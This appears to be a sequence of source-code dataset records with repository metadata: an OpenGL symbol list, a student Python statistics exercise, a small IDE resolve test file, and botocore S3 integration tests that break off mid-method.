'glIndexiv', 'glIndexsv', 'glIndexubv', 'glColor3b', 'glColor3d', 'glColor3f',
'glColor3i', 'glColor3s', 'glColor3ub', 'glColor3ui', 'glColor3us',
'glColor4b', 'glColor4d', 'glColor4f', 'glColor4i', 'glColor4s', 'glColor4ub',
'glColor4ui', 'glColor4us', 'glColor3bv', 'glColor3dv', 'glColor3fv',
'glColor3iv', 'glColor3sv', 'glColor3ubv', 'glColor3uiv', 'glColor3usv',
'glColor4bv', 'glColor4dv', 'glColor4fv', 'glColor4iv', 'glColor4sv',
'glColor4ubv', 'glColor4uiv', 'glColor4usv', 'glTexCoord1d', 'glTexCoord1f',
'glTexCoord1i', 'glTexCoord1s', 'glTexCoord2d', 'glTexCoord2f',
'glTexCoord2i', 'glTexCoord2s', 'glTexCoord3d', 'glTexCoord3f',
'glTexCoord3i', 'glTexCoord3s', 'glTexCoord4d', 'glTexCoord4f',
'glTexCoord4i', 'glTexCoord4s', 'glTexCoord1dv', 'glTexCoord1fv',
'glTexCoord1iv', 'glTexCoord1sv', 'glTexCoord2dv', 'glTexCoord2fv',
'glTexCoord2iv', 'glTexCoord2sv', 'glTexCoord3dv', 'glTexCoord3fv',
'glTexCoord3iv', 'glTexCoord3sv', 'glTexCoord4dv', 'glTexCoord4fv',
'glTexCoord4iv', 'glTexCoord4sv', 'glRasterPos2d', 'glRasterPos2f',
'glRasterPos2i', 'glRasterPos2s', 'glRasterPos3d', 'glRasterPos3f',
'glRasterPos3i', 'glRasterPos3s', 'glRasterPos4d', 'glRasterPos4f',
'glRasterPos4i', 'glRasterPos4s', 'glRasterPos2dv', 'glRasterPos2fv',
'glRasterPos2iv', 'glRasterPos2sv', 'glRasterPos3dv', 'glRasterPos3fv',
'glRasterPos3iv', 'glRasterPos3sv', 'glRasterPos4dv', 'glRasterPos4fv',
'glRasterPos4iv', 'glRasterPos4sv', 'glRectd', 'glRectf', 'glRecti',
'glRects', 'glRectdv', 'glRectfv', 'glRectiv', 'glRectsv', 'glVertexPointer',
'glNormalPointer', 'glColorPointer', 'glIndexPointer', 'glTexCoordPointer',
'glEdgeFlagPointer', 'glGetPointerv', 'glArrayElement', 'glDrawArrays',
'glDrawElements', 'glInterleavedArrays', 'glShadeModel', 'glLightf',
'glLighti', 'glLightfv', 'glLightiv', 'glGetLightfv', 'glGetLightiv',
'glLightModelf', 'glLightModeli', 'glLightModelfv', 'glLightModeliv',
'glMaterialf', 'glMateriali', 'glMaterialfv', 'glMaterialiv',
'glGetMaterialfv', 'glGetMaterialiv', 'glColorMaterial', 'glPixelZoom',
'glPixelStoref', 'glPixelStorei', 'glPixelTransferf', 'glPixelTransferi',
'glPixelMapfv', 'glPixelMapuiv', 'glPixelMapusv', 'glGetPixelMapfv',
'glGetPixelMapuiv', 'glGetPixelMapusv', 'glBitmap', 'glReadPixels',
'glDrawPixels', 'glCopyPixels', 'glStencilFunc', 'glStencilMask',
'glStencilOp', 'glClearStencil', 'glTexGend', 'glTexGenf', 'glTexGeni',
'glTexGendv', 'glTexGenfv', 'glTexGeniv', 'glGetTexGendv', 'glGetTexGenfv',
'glGetTexGeniv', 'glTexEnvf', 'glTexEnvi', 'glTexEnvfv', 'glTexEnviv',
'glGetTexEnvfv', 'glGetTexEnviv', 'glTexParameterf', 'glTexParameteri',
'glTexParameterfv', 'glTexParameteriv', 'glGetTexParameterfv',
'glGetTexParameteriv', 'glGetTexLevelParameterfv', 'glGetTexLevelParameteriv',
'glTexImage1D', 'glTexImage2D', 'glGetTexImage', 'glGenTextures',
'glDeleteTextures', 'glBindTexture', 'glPrioritizeTextures',
'glAreTexturesResident', 'glIsTexture', 'glTexSubImage1D', 'glTexSubImage2D',
'glCopyTexImage1D', 'glCopyTexImage2D', 'glCopyTexSubImage1D',
'glCopyTexSubImage2D', 'glMap1d', 'glMap1f', 'glMap2d', 'glMap2f',
'glGetMapdv', 'glGetMapfv', 'glGetMapiv', 'glEvalCoord1d', 'glEvalCoord1f',
'glEvalCoord1dv', 'glEvalCoord1fv', 'glEvalCoord2d', 'glEvalCoord2f',
'glEvalCoord2dv', 'glEvalCoord2fv', 'glMapGrid1d', 'glMapGrid1f',
'glMapGrid2d', 'glMapGrid2f', 'glEvalPoint1', 'glEvalPoint2', 'glEvalMesh1',
'glEvalMesh2', 'glFogf', 'glFogi', 'glFogfv', 'glFogiv', 'glFeedbackBuffer',
'glPassThrough', 'glSelectBuffer', 'glInitNames', 'glLoadName', 'glPushName',
'glPopName', 'GL_RESCALE_NORMAL', 'GL_CLAMP_TO_EDGE',
'GL_MAX_ELEMENTS_VERTICES', 'GL_MAX_ELEMENTS_INDICES', 'GL_BGR', 'GL_BGRA',
'GL_UNSIGNED_BYTE_3_3_2', 'GL_UNSIGNED_BYTE_2_3_3_REV',
'GL_UNSIGNED_SHORT_5_6_5', 'GL_UNSIGNED_SHORT_5_6_5_REV',
'GL_UNSIGNED_SHORT_4_4_4_4', 'GL_UNSIGNED_SHORT_4_4_4_4_REV',
'GL_UNSIGNED_SHORT_5_5_5_1', 'GL_UNSIGNED_SHORT_1_5_5_5_REV',
'GL_UNSIGNED_INT_8_8_8_8', 'GL_UNSIGNED_INT_8_8_8_8_REV',
'GL_UNSIGNED_INT_10_10_10_2', 'GL_UNSIGNED_INT_2_10_10_10_REV',
'GL_LIGHT_MODEL_COLOR_CONTROL', 'GL_SINGLE_COLOR',
'GL_SEPARATE_SPECULAR_COLOR', 'GL_TEXTURE_MIN_LOD', 'GL_TEXTURE_MAX_LOD',
'GL_TEXTURE_BASE_LEVEL', 'GL_TEXTURE_MAX_LEVEL', 'GL_SMOOTH_POINT_SIZE_RANGE',
'GL_SMOOTH_POINT_SIZE_GRANULARITY', 'GL_SMOOTH_LINE_WIDTH_RANGE',
'GL_SMOOTH_LINE_WIDTH_GRANULARITY', 'GL_ALIASED_POINT_SIZE_RANGE',
'GL_ALIASED_LINE_WIDTH_RANGE', 'GL_PACK_SKIP_IMAGES', 'GL_PACK_IMAGE_HEIGHT',
'GL_UNPACK_SKIP_IMAGES', 'GL_UNPACK_IMAGE_HEIGHT', 'GL_TEXTURE_3D',
'GL_PROXY_TEXTURE_3D', 'GL_TEXTURE_DEPTH', 'GL_TEXTURE_WRAP_R',
'GL_MAX_3D_TEXTURE_SIZE', 'GL_TEXTURE_BINDING_3D', 'glDrawRangeElements',
'glTexImage3D', 'glTexSubImage3D', 'glCopyTexSubImage3D',
'PFNGLDRAWRANGEELEMENTSPROC', 'PFNGLTEXIMAGE3DPROC', 'PFNGLTEXSUBIMAGE3DPROC',
'PFNGLCOPYTEXSUBIMAGE3DPROC', 'GL_CONSTANT_COLOR',
'GL_ONE_MINUS_CONSTANT_COLOR', 'GL_CONSTANT_ALPHA',
'GL_ONE_MINUS_CONSTANT_ALPHA', 'GL_COLOR_TABLE',
'GL_POST_CONVOLUTION_COLOR_TABLE', 'GL_POST_COLOR_MATRIX_COLOR_TABLE',
'GL_PROXY_COLOR_TABLE', 'GL_PROXY_POST_CONVOLUTION_COLOR_TABLE',
'GL_PROXY_POST_COLOR_MATRIX_COLOR_TABLE', 'GL_COLOR_TABLE_SCALE',
'GL_COLOR_TABLE_BIAS', 'GL_COLOR_TABLE_FORMAT', 'GL_COLOR_TABLE_WIDTH',
'GL_COLOR_TABLE_RED_SIZE', 'GL_COLOR_TABLE_GREEN_SIZE',
'GL_COLOR_TABLE_BLUE_SIZE', 'GL_COLOR_TABLE_ALPHA_SIZE',
'GL_COLOR_TABLE_LUMINANCE_SIZE', 'GL_COLOR_TABLE_INTENSITY_SIZE',
'GL_CONVOLUTION_1D', 'GL_CONVOLUTION_2D', 'GL_SEPARABLE_2D',
'GL_CONVOLUTION_BORDER_MODE', 'GL_CONVOLUTION_FILTER_SCALE',
'GL_CONVOLUTION_FILTER_BIAS', 'GL_REDUCE', 'GL_CONVOLUTION_FORMAT',
'GL_CONVOLUTION_WIDTH', 'GL_CONVOLUTION_HEIGHT', 'GL_MAX_CONVOLUTION_WIDTH',
'GL_MAX_CONVOLUTION_HEIGHT', 'GL_POST_CONVOLUTION_RED_SCALE',
'GL_POST_CONVOLUTION_GREEN_SCALE', 'GL_POST_CONVOLUTION_BLUE_SCALE',
'GL_POST_CONVOLUTION_ALPHA_SCALE', 'GL_POST_CONVOLUTION_RED_BIAS',
'GL_POST_CONVOLUTION_GREEN_BIAS', 'GL_POST_CONVOLUTION_BLUE_BIAS',
'GL_POST_CONVOLUTION_ALPHA_BIAS', 'GL_CONSTANT_BORDER', 'GL_REPLICATE_BORDER',
'GL_CONVOLUTION_BORDER_COLOR', 'GL_COLOR_MATRIX',
'GL_COLOR_MATRIX_STACK_DEPTH', 'GL_MAX_COLOR_MATRIX_STACK_DEPTH',
'GL_POST_COLOR_MATRIX_RED_SCALE', 'GL_POST_COLOR_MATRIX_GREEN_SCALE',
'GL_POST_COLOR_MATRIX_BLUE_SCALE', 'GL_POST_COLOR_MATRIX_ALPHA_SCALE',
'GL_POST_COLOR_MATRIX_RED_BIAS', 'GL_POST_COLOR_MATRIX_GREEN_BIAS',
'GL_POST_COLOR_MATRIX_BLUE_BIAS', 'GL_POST_COLOR_MATRIX_ALPHA_BIAS',
'GL_HISTOGRAM', 'GL_PROXY_HISTOGRAM', 'GL_HISTOGRAM_WIDTH',
'GL_HISTOGRAM_FORMAT', 'GL_HISTOGRAM_RED_SIZE', 'GL_HISTOGRAM_GREEN_SIZE',
'GL_HISTOGRAM_BLUE_SIZE', 'GL_HISTOGRAM_ALPHA_SIZE',
'GL_HISTOGRAM_LUMINANCE_SIZE', 'GL_HISTOGRAM_SINK', 'GL_MINMAX',
'GL_MINMAX_FORMAT', 'GL_MINMAX_SINK', 'GL_TABLE_TOO_LARGE',
'GL_BLEND_EQUATION', 'GL_MIN', 'GL_MAX', 'GL_FUNC_ADD', 'GL_FUNC_SUBTRACT',
'GL_FUNC_REVERSE_SUBTRACT', 'GL_BLEND_COLOR', 'glColorTable',
'glColorSubTable', 'glColorTableParameteriv', 'glColorTableParameterfv',
'glCopyColorSubTable', 'glCopyColorTable', 'glGetColorTable',
'glGetColorTableParameterfv', 'glGetColorTableParameteriv', 'glBlendEquation',
'glBlendColor', 'glHistogram', 'glResetHistogram', 'glGetHistogram',
'glGetHistogramParameterfv', 'glGetHistogramParameteriv', 'glMinmax',
'glResetMinmax', 'glGetMinmax', 'glGetMinmaxParameterfv',
'glGetMinmaxParameteriv', 'glConvolutionFilter1D', 'glConvolutionFilter2D',
'glConvolutionParameterf', 'glConvolutionParameterfv',
'glConvolutionParameteri', 'glConvolutionParameteriv',
'glCopyConvolutionFilter1D', 'glCopyConvolutionFilter2D',
'glGetConvolutionFilter', 'glGetConvolutionParameterfv',
'glGetConvolutionParameteriv', 'glSeparableFilter2D', 'glGetSeparableFilter',
'PFNGLBLENDCOLORPROC', 'PFNGLBLENDEQUATIONPROC', 'GL_TEXTURE0', 'GL_TEXTURE1',
'GL_TEXTURE2', 'GL_TEXTURE3', 'GL_TEXTURE4', 'GL_TEXTURE5', 'GL_TEXTURE6',
'GL_TEXTURE7', 'GL_TEXTURE8', 'GL_TEXTURE9', 'GL_TEXTURE10', 'GL_TEXTURE11',
'GL_TEXTURE12', 'GL_TEXTURE13', 'GL_TEXTURE14', 'GL_TEXTURE15',
'GL_TEXTURE16', 'GL_TEXTURE17', 'GL_TEXTURE18', 'GL_TEXTURE19',
'GL_TEXTURE20', 'GL_TEXTURE21', 'GL_TEXTURE22', 'GL_TEXTURE23',
'GL_TEXTURE24', 'GL_TEXTURE25', 'GL_TEXTURE26', 'GL_TEXTURE27',
'GL_TEXTURE28', 'GL_TEXTURE29', 'GL_TEXTURE30', 'GL_TEXTURE31',
'GL_ACTIVE_TEXTURE', 'GL_CLIENT_ACTIVE_TEXTURE', 'GL_MAX_TEXTURE_UNITS',
'GL_NORMAL_MAP', 'GL_REFLECTION_MAP', 'GL_TEXTURE_CUBE_MAP',
'GL_TEXTURE_BINDING_CUBE_MAP', 'GL_TEXTURE_CUBE_MAP_POSITIVE_X',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_X', 'GL_TEXTURE_CUBE_MAP_POSITIVE_Y',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_Y', 'GL_TEXTURE_CUBE_MAP_POSITIVE_Z',
'GL_TEXTURE_CUBE_MAP_NEGATIVE_Z', 'GL_PROXY_TEXTURE_CUBE_MAP',
'GL_MAX_CUBE_MAP_TEXTURE_SIZE', 'GL_COMPRESSED_ALPHA',
'GL_COMPRESSED_LUMINANCE', 'GL_COMPRESSED_LUMINANCE_ALPHA',
'GL_COMPRESSED_INTENSITY', 'GL_COMPRESSED_RGB', 'GL_COMPRESSED_RGBA',
'GL_TEXTURE_COMPRESSION_HINT', 'GL_TEXTURE_COMPRESSED_IMAGE_SIZE',
'GL_TEXTURE_COMPRESSED', 'GL_NUM_COMPRESSED_TEXTURE_FORMATS',
'GL_COMPRESSED_TEXTURE_FORMATS', 'GL_MULTISAMPLE',
'GL_SAMPLE_ALPHA_TO_COVERAGE', 'GL_SAMPLE_ALPHA_TO_ONE', 'GL_SAMPLE_COVERAGE',
'GL_SAMPLE_BUFFERS', 'GL_SAMPLES', 'GL_SAMPLE_COVERAGE_VALUE',
'GL_SAMPLE_COVERAGE_INVERT', 'GL_MULTISAMPLE_BIT',
'GL_TRANSPOSE_MODELVIEW_MATRIX', 'GL_TRANSPOSE_PROJECTION_MATRIX',
'GL_TRANSPOSE_TEXTURE_MATRIX', 'GL_TRANSPOSE_COLOR_MATRIX', 'GL_COMBINE',
'GL_COMBINE_RGB', 'GL_COMBINE_ALPHA', 'GL_SOURCE0_RGB', 'GL_SOURCE1_RGB',
'GL_SOURCE2_RGB', 'GL_SOURCE0_ALPHA', 'GL_SOURCE1_ALPHA', 'GL_SOURCE2_ALPHA',
'GL_OPERAND0_RGB', 'GL_OPERAND1_RGB', 'GL_OPERAND2_RGB', 'GL_OPERAND0_ALPHA',
'GL_OPERAND1_ALPHA', 'GL_OPERAND2_ALPHA', 'GL_RGB_SCALE', 'GL_ADD_SIGNED',
'GL_INTERPOLATE', 'GL_SUBTRACT', 'GL_CONSTANT', 'GL_PRIMARY_COLOR',
'GL_PREVIOUS', 'GL_DOT3_RGB', 'GL_DOT3_RGBA', 'GL_CLAMP_TO_BORDER',
'glActiveTexture', 'glClientActiveTexture', 'glCompressedTexImage1D',
'glCompressedTexImage2D', 'glCompressedTexImage3D',
'glCompressedTexSubImage1D', 'glCompressedTexSubImage2D',
'glCompressedTexSubImage3D', 'glGetCompressedTexImage', 'glMultiTexCoord1d',
'glMultiTexCoord1dv', 'glMultiTexCoord1f', 'glMultiTexCoord1fv',
'glMultiTexCoord1i', 'glMultiTexCoord1iv', 'glMultiTexCoord1s',
'glMultiTexCoord1sv', 'glMultiTexCoord2d', 'glMultiTexCoord2dv',
'glMultiTexCoord2f', 'glMultiTexCoord2fv', 'glMultiTexCoord2i',
'glMultiTexCoord2iv', 'glMultiTexCoord2s', 'glMultiTexCoord2sv',
'glMultiTexCoord3d', 'glMultiTexCoord3dv', 'glMultiTexCoord3f',
'glMultiTexCoord3fv', 'glMultiTexCoord3i', 'glMultiTexCoord3iv',
'glMultiTexCoord3s', 'glMultiTexCoord3sv', 'glMultiTexCoord4d',
'glMultiTexCoord4dv', 'glMultiTexCoord4f', 'glMultiTexCoord4fv',
'glMultiTexCoord4i', 'glMultiTexCoord4iv', 'glMultiTexCoord4s',
'glMultiTexCoord4sv', 'glLoadTransposeMatrixd', 'glLoadTransposeMatrixf',
'glMultTransposeMatrixd', 'glMultTransposeMatrixf', 'glSampleCoverage',
'PFNGLACTIVETEXTUREPROC', 'PFNGLSAMPLECOVERAGEPROC',
'PFNGLCOMPRESSEDTEXIMAGE3DPROC', 'PFNGLCOMPRESSEDTEXIMAGE2DPROC',
'PFNGLCOMPRESSEDTEXIMAGE1DPROC', 'PFNGLCOMPRESSEDTEXSUBIMAGE3DPROC',
'PFNGLCOMPRESSEDTEXSUBIMAGE2DPROC', 'PFNGLCOMPRESSEDTEXSUBIMAGE1DPROC',
'PFNGLGETCOMPRESSEDTEXIMAGEPROC', 'GL_ARB_multitexture', 'GL_TEXTURE0_ARB',
'GL_TEXTURE1_ARB', 'GL_TEXTURE2_ARB', 'GL_TEXTURE3_ARB', 'GL_TEXTURE4_ARB',
'GL_TEXTURE5_ARB', 'GL_TEXTURE6_ARB', 'GL_TEXTURE7_ARB', 'GL_TEXTURE8_ARB',
'GL_TEXTURE9_ARB', 'GL_TEXTURE10_ARB', 'GL_TEXTURE11_ARB', 'GL_TEXTURE12_ARB',
'GL_TEXTURE13_ARB', 'GL_TEXTURE14_ARB', 'GL_TEXTURE15_ARB',
'GL_TEXTURE16_ARB', 'GL_TEXTURE17_ARB', 'GL_TEXTURE18_ARB',
'GL_TEXTURE19_ARB', 'GL_TEXTURE20_ARB', 'GL_TEXTURE21_ARB',
'GL_TEXTURE22_ARB', 'GL_TEXTURE23_ARB', 'GL_TEXTURE24_ARB',
'GL_TEXTURE25_ARB', 'GL_TEXTURE26_ARB', 'GL_TEXTURE27_ARB',
'GL_TEXTURE28_ARB', 'GL_TEXTURE29_ARB', 'GL_TEXTURE30_ARB',
'GL_TEXTURE31_ARB', 'GL_ACTIVE_TEXTURE_ARB', 'GL_CLIENT_ACTIVE_TEXTURE_ARB',
'GL_MAX_TEXTURE_UNITS_ARB', 'glActiveTextureARB', 'glClientActiveTextureARB',
'glMultiTexCoord1dARB', 'glMultiTexCoord1dvARB', 'glMultiTexCoord1fARB',
'glMultiTexCoord1fvARB', 'glMultiTexCoord1iARB', 'glMultiTexCoord1ivARB',
'glMultiTexCoord1sARB', 'glMultiTexCoord1svARB', 'glMultiTexCoord2dARB',
'glMultiTexCoord2dvARB', 'glMultiTexCoord2fARB', 'glMultiTexCoord2fvARB',
'glMultiTexCoord2iARB', 'glMultiTexCoord2ivARB', 'glMultiTexCoord2sARB',
'glMultiTexCoord2svARB', 'glMultiTexCoord3dARB', 'glMultiTexCoord3dvARB',
'glMultiTexCoord3fARB', 'glMultiTexCoord3fvARB', 'glMultiTexCoord3iARB',
'glMultiTexCoord3ivARB', 'glMultiTexCoord3sARB', 'glMultiTexCoord3svARB',
'glMultiTexCoord4dARB', 'glMultiTexCoord4dvARB', 'glMultiTexCoord4fARB',
'glMultiTexCoord4fvARB', 'glMultiTexCoord4iARB', 'glMultiTexCoord4ivARB',
'glMultiTexCoord4sARB', 'glMultiTexCoord4svARB', 'PFNGLACTIVETEXTUREARBPROC',
'PFNGLCLIENTACTIVETEXTUREARBPROC', 'PFNGLMULTITEXCOORD1DARBPROC',
'PFNGLMULTITEXCOORD1DVARBPROC', 'PFNGLMULTITEXCOORD1FARBPROC',
'PFNGLMULTITEXCOORD1FVARBPROC', 'PFNGLMULTITEXCOORD1IARBPROC',
'PFNGLMULTITEXCOORD1IVARBPROC', 'PFNGLMULTITEXCOORD1SARBPROC',
'PFNGLMULTITEXCOORD1SVARBPROC', 'PFNGLMULTITEXCOORD2DARBPROC',
'PFNGLMULTITEXCOORD2DVARBPROC', 'PFNGLMULTITEXCOORD2FARBPROC',
'PFNGLMULTITEXCOORD2FVARBPROC', 'PFNGLMULTITEXCOORD2IARBPROC',
'PFNGLMULTITEXCOORD2IVARBPROC', 'PFNGLMULTITEXCOORD2SARBPROC',
'PFNGLMULTITEXCOORD2SVARBPROC', 'PFNGLMULTITEXCOORD3DARBPROC',
'PFNGLMULTITEXCOORD3DVARBPROC', 'PFNGLMULTITEXCOORD3FARBPROC',
'PFNGLMULTITEXCOORD3FVARBPROC', 'PFNGLMULTITEXCOORD3IARBPROC',
'PFNGLMULTITEXCOORD3IVARBPROC', 'PFNGLMULTITEXCOORD3SARBPROC',
'PFNGLMULTITEXCOORD3SVARBPROC', 'PFNGLMULTITEXCOORD4DARBPROC',
'PFNGLMULTITEXCOORD4DVARBPROC', 'PFNGLMULTITEXCOORD4FARBPROC',
'PFNGLMULTITEXCOORD4FVARBPROC', 'PFNGLMULTITEXCOORD4IARBPROC',
'PFNGLMULTITEXCOORD4IVARBPROC', 'PFNGLMULTITEXCOORD4SARBPROC',
'PFNGLMULTITEXCOORD4SVARBPROC', 'GL_MESA_shader_debug',
'GL_DEBUG_OBJECT_MESA', 'GL_DEBUG_PRINT_MESA', 'GL_DEBUG_ASSERT_MESA',
'glCreateDebugObjectMESA', 'glClearDebugLogMESA', 'glGetDebugLogMESA',
'glGetDebugLogLengthMESA', 'GL_MESA_packed_depth_stencil',
'GL_DEPTH_STENCIL_MESA', 'GL_UNSIGNED_INT_24_8_MESA',
'GL_UNSIGNED_INT_8_24_REV_MESA', 'GL_UNSIGNED_SHORT_15_1_MESA',
'GL_UNSIGNED_SHORT_1_15_REV_MESA', 'GL_MESA_program_debug',
'GL_FRAGMENT_PROGRAM_POSITION_MESA', 'GL_FRAGMENT_PROGRAM_CALLBACK_MESA',
'GL_FRAGMENT_PROGRAM_CALLBACK_FUNC_MESA',
'GL_FRAGMENT_PROGRAM_CALLBACK_DATA_MESA', 'GL_VERTEX_PROGRAM_POSITION_MESA',
'GL_VERTEX_PROGRAM_CALLBACK_MESA', 'GL_VERTEX_PROGRAM_CALLBACK_FUNC_MESA',
'GL_VERTEX_PROGRAM_CALLBACK_DATA_MESA', 'GLprogramcallbackMESA',
'glProgramCallbackMESA', 'glGetProgramRegisterfvMESA',
'GL_MESA_texture_array', 'GL_ATI_blend_equation_separate',
'GL_ALPHA_BLEND_EQUATION_ATI', 'glBlendEquationSeparateATI',
'PFNGLBLENDEQUATIONSEPARATEATIPROC', 'GLeglImageOES', 'GL_OES_EGL_image',
'PFNGLEGLIMAGETARGETTEXTURE2DOESPROC',
'PFNGLEGLIMAGETARGETRENDERBUFFERSTORAGEOESPROC']
# END GENERATED CONTENT (do not edit above this line)
| [
"[email protected]"
] | |
18f43854543ea9c9c8c46129f56e665c7042d7d6 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/468/usersdata/304/111685/submittedfiles/Av2_Parte3.py | 8f2fd9356f208463f08f81498b9a718876b02d30 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
m = int(input('Quantas listas: '))
n = int(input('Qntd elemento listas: '))
for i in range(0, m, 1):
    lista = []
    for j in range(0, n, 1):
        lista.append(int(input('Elemento: ')))
    media = sum(lista)/len(lista)
    # Sample standard deviation: sqrt(sum((x - mean)**2) / (n - 1)).
    soma = 0
    for k in range(0, n, 1):
        soma += (lista[k] - media)**2
    dp = ((1/(n-1))*soma)**(1/2)
    print('%.2f' % media)
    print('%.2f' % dp)
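# Quick sanity check with hypothetical input: for the list [1, 2, 3],
# media = 2.00 and dp = sqrt(((1-2)**2 + (2-2)**2 + (3-2)**2) / 2) = 1.00.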
| [
"[email protected]"
] | |
6ce2e5527681d74d95f3836d7b83db44985c073f | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/resolve/AugmentedAfterAugmented.py | af870d6359d0bd6f1ecb6491cd6243ee652c1cc7 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 53 | py | foo = 1
foo += 1
while True:
foo += 2
# <ref>
| [
"[email protected]"
] | |
877c2c1ffca4cf685c39619bd5877709a434348d | 0d0ee226b655e7e665d3e7fef2aeec701f74d581 | /tests/integration/test_s3.py | 87e0d8ed54ceb00d306a916b40b333916b6578b8 | [
"MIT"
] | permissive | spcs/botocore | 435c180e93aa670ccf924a14ae776dd075d09fde | fc6b7454e5e17cfd6428b1abdffa38856d77bd25 | refs/heads/master | 2021-01-17T06:42:31.356668 | 2013-10-02T19:12:49 | 2013-10-02T19:12:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,424 | py | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import time
import random
from tests import unittest
from collections import defaultdict
try:
from itertools import izip_longest as zip_longest
except ImportError:
from itertools import zip_longest
import botocore.session
class BaseS3Test(unittest.TestCase):
def setUp(self):
self.session = botocore.session.get_session()
self.service = self.session.get_service('s3')
self.endpoint = self.service.get_endpoint('us-east-1')
class TestS3Buckets(BaseS3Test):
def test_can_make_request(self):
# Basic smoke test to ensure we can talk to s3.
operation = self.service.get_operation('ListBuckets')
http, result = operation.call(self.endpoint)
self.assertEqual(http.status_code, 200)
# Can't really assume anything about whether or not they have buckets,
# but we can assume something about the structure of the response.
self.assertEqual(sorted(list(result.keys())),
['Buckets', 'Owner', 'ResponseMetadata'])
class TestS3Objects(BaseS3Test):
def setUp(self):
super(TestS3Objects, self).setUp()
self.bucket_name = 'botocoretest%s-%s' % (
int(time.time()), random.randint(1, 1000))
operation = self.service.get_operation('CreateBucket')
operation.call(self.endpoint, bucket=self.bucket_name)
self.keys = []
def tearDown(self):
for key in self.keys:
operation = self.service.get_operation('DeleteObject')
operation.call(self.endpoint, bucket=self.bucket_name,
key=key)
operation = self.service.get_operation('DeleteBucket')
operation.call(self.endpoint, bucket=self.bucket_name)
def create_object(self, key_name, body='foo'):
self.keys.append(key_name)
operation = self.service.get_operation('PutObject')
response = operation.call(self.endpoint, bucket=self.bucket_name, key=key_name,
body=body)[0]
self.assertEqual(response.status_code, 200)
def create_multipart_upload(self, key_name):
operation = self.service.get_operation('CreateMultipartUpload')
http_response, parsed = operation.call(self.endpoint,
bucket=self.bucket_name,
key=key_name)
upload_id = parsed['UploadId']
self.addCleanup(self.service.get_operation('AbortMultipartUpload').call,
self.endpoint, upload_id=upload_id,
bucket=self.bucket_name, key=key_name)
def test_can_delete_urlencoded_object(self):
key_name = 'a+b/foo'
self.create_object(key_name=key_name)
self.keys.pop()
bucket_contents = self.service.get_operation('ListObjects').call(
self.endpoint, bucket=self.bucket_name)[1]['Contents']
self.assertEqual(len(bucket_contents), 1)
self.assertEqual(bucket_contents[0]['Key'], 'a+b/foo')
subdir_contents = self.service.get_operation('ListObjects').call(
self.endpoint, bucket=self.bucket_name, prefix='a+b')[1]['Contents']
self.assertEqual(len(subdir_contents), 1)
self.assertEqual(subdir_contents[0]['Key'], 'a+b/foo')
operation = self.service.get_operation('DeleteObject')
response = operation.call(self.endpoint, bucket=self.bucket_name,
key=key_name)[0]
self.assertEqual(response.status_code, 204)
def test_can_paginate(self):
for i in range(5):
key_name = 'key%s' % i
self.create_object(key_name)
# Eventual consistency.
time.sleep(3)
operation = self.service.get_operation('ListObjects')
generator = operation.paginate(self.endpoint, max_keys=1,
bucket=self.bucket_name)
responses = list(generator)
self.assertEqual(len(responses), 5, responses)
data = [r[1] for r in responses]
key_names = [el['Contents'][0]['Key']
for el in data]
self.assertEqual(key_names, ['key0', 'key1', 'key2', 'key3', 'key4'])
def test_result_key_iters(self):
for i in range(5):
key_name = 'key/%s/%s' % (i, i)
self.create_object(key_name)
key_name2 = 'key/%s' % i
self.create_object(key_name2)
time.sleep(3)
operation = self.service.get_operation('ListObjects')
generator = operation.paginate(self.endpoint, max_keys=2,
prefix='key/',
delimiter='/',
bucket=self.bucket_name)
iterators = generator.result_key_iters()
response = defaultdict(list)
key_names = [i.result_key for i in iterators]
for vals in zip_longest(*iterators):
for k, val in zip(key_names, vals):
response[k].append(val)
self.assertIn('Contents', response)
self.assertIn('CommonPrefixes', response)
def test_can_get_and_put_object(self):
self.create_object('foobarbaz', body='body contents')
time.sleep(3)
operation = self.service.get_operation('GetObject')
response = operation.call(self.endpoint, bucket=self.bucket_name,
key='foobarbaz')
data = response[1]
self.assertEqual(data['Body'].read().decode('utf-8'), 'body contents')
def test_paginate_max_items(self):
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key1')
self.create_multipart_upload('foo/key2')
self.create_multipart_upload('foobar/key1')
self.create_multipart_upload('foobar/key2')
self.create_multipart_upload('bar/key1')
self.create_multipart_upload('bar/key2')
operation = self.service.get_operation('ListMultipartUploads')
# With no max items.
pages = operation.paginate(self.endpoint, bucket=self.bucket_name)
iterators = pages.result_key_iters()
self.assertEqual(len(iterators), 1)
